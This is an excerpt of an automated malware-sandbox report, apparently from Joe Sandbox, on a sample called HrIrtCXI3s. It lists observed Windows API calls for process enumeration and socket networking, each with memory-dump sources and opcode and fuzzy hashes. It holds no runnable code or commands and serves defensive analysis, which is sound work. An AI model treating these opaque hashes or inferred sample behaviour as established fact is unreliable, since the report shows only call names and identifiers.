                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: ecde24d808acc129035598b6895abf4e336ac0888fe2f000a78af11464bf999d
                                                      • Instruction ID: ae15dc1e113ce02e43591dabb55a5dbc2f502a8307e93a4f54fef3960891d9b9
                                                      • Opcode Fuzzy Hash: ecde24d808acc129035598b6895abf4e336ac0888fe2f000a78af11464bf999d
                                                      • Instruction Fuzzy Hash: 88112CF697C226EFA3319511179C9BAB256BB93331F304437A802D7941E3E44ED57071
                                                      APIs
                                                      • Process32FirstW.KERNEL32(30F902FF,30F902FF,30F902FF,000035A0), ref: 0725038A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016783354.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7250000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 94e8d019f8288b88c2af4026b51f4a5b1b2a90634b56d23ab0faf8cc08ca8843
                                                      • Instruction ID: 0d116110e09e65a26c6fe9523d567a4fd0e3985c23e51991d73af51e31ad0170
                                                      • Opcode Fuzzy Hash: 94e8d019f8288b88c2af4026b51f4a5b1b2a90634b56d23ab0faf8cc08ca8843
                                                      • Instruction Fuzzy Hash: 2B117DE70682437F97234AB04F405F57B6AEBDB3707311869E89386602E2B59A0B4531
                                                      APIs
                                                      • Process32NextW.KERNEL32(?,?), ref: 072603E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 142ca89b00827a930ee95d68f6bfb57c6ab165aead72bf1db45a5980aa5d2b39
                                                      • Instruction ID: 2e41e1ee52f66e0698b98fd51c9696e5d8e7eb99c41b69a04462dfa68ce445fe
                                                      • Opcode Fuzzy Hash: 142ca89b00827a930ee95d68f6bfb57c6ab165aead72bf1db45a5980aa5d2b39
                                                      • Instruction Fuzzy Hash: 6111CCE387C651AFE732922057CCDF67725FA9B236730406BE801DB142E1A51EE67022
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: ee85b533d3a740be7ff35c6b6b820b428b21e4d6c6dde60c128265f26317db0f
                                                      • Instruction ID: c63f1df0b52428703afaeaa134ed3657443ea09f4d6f553ead066b672df1c48d
                                                      • Opcode Fuzzy Hash: ee85b533d3a740be7ff35c6b6b820b428b21e4d6c6dde60c128265f26317db0f
                                                      • Instruction Fuzzy Hash: 9D114CE757C221AFE23256511798DB7A61AF693231B308437F842E7A42E1D41EE93072
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 9e9c9fe3dfdfee2b595ca76540c35577e21139fe91cda8d8748fbf8e800e1c36
                                                      • Instruction ID: 8e5e24a79d2f15499114755a19de5289b4ca678a9ec138a1b1a0a67a5fbf5f86
                                                      • Opcode Fuzzy Hash: 9e9c9fe3dfdfee2b595ca76540c35577e21139fe91cda8d8748fbf8e800e1c36
                                                      • Instruction Fuzzy Hash: DC014EE757C212EF62725151178CDB6651AF693231B308437F802E7A41E2E41DD53072
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016783354.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7250000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 976be4cfb5d3a15022f4cc89910ede1b8dc0653afa1ea6e80afc3bf819cfffde
                                                      • Instruction ID: f1a1f325ad51e77c43ae54b399f15889161adb2fcb61740970c99c4dfd4af3ca
                                                      • Opcode Fuzzy Hash: 976be4cfb5d3a15022f4cc89910ede1b8dc0653afa1ea6e80afc3bf819cfffde
                                                      • Instruction Fuzzy Hash: 2101FEFB1B9202BFA12395A49F449FAB729FADB770B300879F80397501F2F4591A5531
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: ed10d65adf4fb270a7b97580cae8165c3e5fdde0626a3cc610a7be957cc76956
                                                      • Instruction ID: 43da63b0697d859a375b5b97ed31db31106bf0f6c4c7606e7a9063b3bcfaee22
                                                      • Opcode Fuzzy Hash: ed10d65adf4fb270a7b97580cae8165c3e5fdde0626a3cc610a7be957cc76956
                                                      • Instruction Fuzzy Hash: 2D01BDE7478211EFA23152612B99AF6B719F793331F304427E846E7A82D1E419E63033
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016783354.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7250000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 30ec1e1668b75ec18542987c2b10156851567b7403387827f2f6c5f93e644579
                                                      • Instruction ID: 90fb63c725e276f354eeab53069859cc96858fe6352ea14802ff9b2146fa4591
                                                      • Opcode Fuzzy Hash: 30ec1e1668b75ec18542987c2b10156851567b7403387827f2f6c5f93e644579
                                                      • Instruction Fuzzy Hash: 9001A7EB1B9102BEA12395A05F509FAA62EE6DB771B304835F903D3602F2F48A0A1531
                                                      APIs
                                                      • Process32NextW.KERNEL32(?,?), ref: 072603E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 4af3a1e66b7e3caa08fdc1feccd90cd6cd2825731fae74e3571149eec169cc64
                                                      • Instruction ID: 2b9bd732ebc7f36c183606375fa71c0eaf350cba969f7e9258ad31871426d92b
                                                      • Opcode Fuzzy Hash: 4af3a1e66b7e3caa08fdc1feccd90cd6cd2825731fae74e3571149eec169cc64
                                                      • Instruction Fuzzy Hash: F10170E78B8216AFA2325251178CEF6B616F683331B304437EC42D7A41E1E51EEA3072
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016783354.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7250000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: e5ce19e82da2f5070a80157d9b61b740c2b6009b1d6c9c8d365bb7c83ef0aef1
                                                      • Instruction ID: 4f2e03c8a33b6a54211197b51c00fb4a188fd42e8a055696111423681f5ede63
                                                      • Opcode Fuzzy Hash: e5ce19e82da2f5070a80157d9b61b740c2b6009b1d6c9c8d365bb7c83ef0aef1
                                                      • Instruction Fuzzy Hash: E40120EB1682027DE22395E04F405F9BB2EFAD73707310475F45397602F2F48A0A1132
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: f2a7ac49e8569c8b29f7c963e7935738cacd528e8e709890519d7fc01bfbdb89
                                                      • Instruction ID: 3f5f4bb785ac36bcc955b088b8fb5f89add59e35155b9f7bc0009be580fa22c3
                                                      • Opcode Fuzzy Hash: f2a7ac49e8569c8b29f7c963e7935738cacd528e8e709890519d7fc01bfbdb89
                                                      • Instruction Fuzzy Hash: CCF0A2E39742129F9230A571178CAF67209F683671B308827E842D7540F1D55DE73072
                                                      APIs
                                                      • Process32FirstW.KERNEL32(30F902FF,30F902FF,30F902FF,000035A0), ref: 0725038A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016783354.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7250000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 0a23a6ab55d23b810f9c969b3141588d0efd4fbb80716d9ef41b774169a448f4
                                                      • Instruction ID: 9ddb99c1f5543d6e0c3d4cce3050827b1bdba33b0336d53bc0d7a7bfb4e57e60
                                                      • Opcode Fuzzy Hash: 0a23a6ab55d23b810f9c969b3141588d0efd4fbb80716d9ef41b774169a448f4
                                                      • Instruction Fuzzy Hash: 2BF0E9EB1A51027DA11391D01B146F6EB7DFAD7371B304035F803A3A02B2F44B0A2431
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 0954eb6c1d49400217f1b6c09f32207fed97dd4d9f35ddd5425751e37e18ba5e
                                                      • Instruction ID: ae02ac859cd43778880b5b43014960ce98b7c99738fee2c3696b48cbadcaf491
                                                      • Opcode Fuzzy Hash: 0954eb6c1d49400217f1b6c09f32207fed97dd4d9f35ddd5425751e37e18ba5e
                                                      • Instruction Fuzzy Hash: F0F0ACF2974301AFD63129611B986F7B369F713631F304826F880E7881E2E519D72061
                                                      APIs
                                                      • getsockname.WS2_32(?,?,00000080), ref: 0059AFD1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: getsockname
                                                      • String ID:
                                                      • API String ID: 3358416759-0
                                                      • Opcode ID: 7439bf74513d1b9be844e9ea9f322c12232353c4a00db2942516b94cca79a322
                                                      • Instruction ID: 44c9e503fa17a1dad689c3aa56db87cf5a935192ee32e091cb4c9e7a0c920295
                                                      • Opcode Fuzzy Hash: 7439bf74513d1b9be844e9ea9f322c12232353c4a00db2942516b94cca79a322
                                                      • Instruction Fuzzy Hash: 5E11847080878596FB268F1CD4027E6B7F4FFD0329F109A18E59942550F7369AC58BD2
                                                      APIs
                                                      • Process32NextW.KERNEL32(?,?), ref: 072603E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 840711077497e1f58e5a528e4718be4c94897406b55057ad3a74283b7892af02
                                                      • Instruction ID: 893291b13a45cb4c0d94690c874d1c9668c9239c1a7751aefa7f670401cebf0f
                                                      • Opcode Fuzzy Hash: 840711077497e1f58e5a528e4718be4c94897406b55057ad3a74283b7892af02
                                                      • Instruction Fuzzy Hash: 320199F29293119FCB336B7122C95F9BB60FE43132B6484BAD8809F846D26905576262
                                                      APIs
                                                      • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0059A97F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: send
                                                      • String ID:
                                                      • API String ID: 2809346765-0
                                                      • Opcode ID: b79c329d4546e731780b37e677c2da6458da7dead77c242f6bb8fd3374bf3992
                                                      • Instruction ID: 10888b264d76c55d978d2fbd8732d1e96554be7615e9e45452149cdd31ec9afe
                                                      • Opcode Fuzzy Hash: b79c329d4546e731780b37e677c2da6458da7dead77c242f6bb8fd3374bf3992
                                                      • Instruction Fuzzy Hash: 4601A771B007109FD7148F14D845B56BBA5FFC4720F068559E9982B361C331AC108BE1
                                                      APIs
                                                      • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0058712E,?,?,?,00001001,00000000), ref: 0059A90C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: recvfrom
                                                      • String ID:
                                                      • API String ID: 846543921-0
                                                      • Opcode ID: 0a485b8c76018f10d8951c776425d288153d47bf22b86291deebbe4023dc7ee7
                                                      • Instruction ID: 971849947d020690e09dc8e28340547fba22b2a7b3d5774f41cc86076a546f16
                                                      • Opcode Fuzzy Hash: 0a485b8c76018f10d8951c776425d288153d47bf22b86291deebbe4023dc7ee7
                                                      • Instruction Fuzzy Hash: 00F06D75109308AFD6209E01DC44D6BBBEDFFC9758F05456DF948232118270AE10CAB2
                                                      APIs
                                                      • socket.WS2_32(?,0059B280,00000000,-00000001,00000000,0059B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0059AF67
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: socket
                                                      • String ID:
                                                      • API String ID: 98920635-0
                                                      • Opcode ID: ce3b63192b6759bb91e2afe6fdf97d23db8f0ac38253d4705d8ad0bd08161a2e
                                                      • Instruction ID: 4b65d020088aa0da07a83ed352b0cc9186ec7edbbe92bc5e6b77bbda8f7a243f
                                                      • Opcode Fuzzy Hash: ce3b63192b6759bb91e2afe6fdf97d23db8f0ac38253d4705d8ad0bd08161a2e
                                                      • Instruction Fuzzy Hash: 03E0EDB6A092256BDA54DE18E8449ABF769EFC4B20F054A49B85467204C330AC5487F2
                                                      APIs
                                                      • Process32NextW.KERNEL32(?,?), ref: 072603E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: f3350e4cf5aedb9438ab547a57020befb11687cdb77847597f7cbc2f3e29e566
                                                      • Instruction ID: dac8828b05d927ffc133495e2cc585d18713d265d78bf08c8ab5536730430f9e
                                                      • Opcode Fuzzy Hash: f3350e4cf5aedb9438ab547a57020befb11687cdb77847597f7cbc2f3e29e566
                                                      • Instruction Fuzzy Hash: 1DD022E7074002AE3AB2223237988795409E083031B31C923A482F794088DC0EE93472
                                                      APIs
                                                      • closesocket.WS2_32(?,00599422,?,?,?,?,?,?,?,?,?,?,?,w3X,00964C60,00000000), ref: 0059B04C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: closesocket
                                                      • String ID:
                                                      • API String ID: 2781271927-0
                                                      • Opcode ID: 54d3a439ff2741fd4a9f036122d5b059d6c6fd98ef4c759e398b965d93e16086
                                                      • Instruction ID: a087ca8671ade547be901c608cc9e76f5a1b7bbf4f919cf8956b1b671c32c5ea
                                                      • Opcode Fuzzy Hash: 54d3a439ff2741fd4a9f036122d5b059d6c6fd98ef4c759e398b965d93e16086
                                                      • Instruction Fuzzy Hash: C3D0C23070020057EE208A54D988A477B2B7FC0710F28CB68E42C4A150E73BCD438602
                                                      APIs
                                                      • Process32NextW.KERNEL32(?,?), ref: 072603E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 1ac500922cf66812950395678c1557462ede03c344d22b8ef23b3b5073ff0ab1
                                                      • Instruction ID: 13202b2ff95511cb303288b3a60aab9819553ad0825cb77751d575b5da79b223
                                                      • Opcode Fuzzy Hash: 1ac500922cf66812950395678c1557462ede03c344d22b8ef23b3b5073ff0ab1
                                                      • Instruction Fuzzy Hash: 91C022E304100E7A6B213A602B908FA211CA883170B32CA28A840A7100988C084C10A2
                                                      APIs
                                                      • ioctlsocket.WS2_32(?,8004667E,?,?,0050AF56,?,00000001), ref: 005367FC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: ioctlsocket
                                                      • String ID:
                                                      • API String ID: 3577187118-0
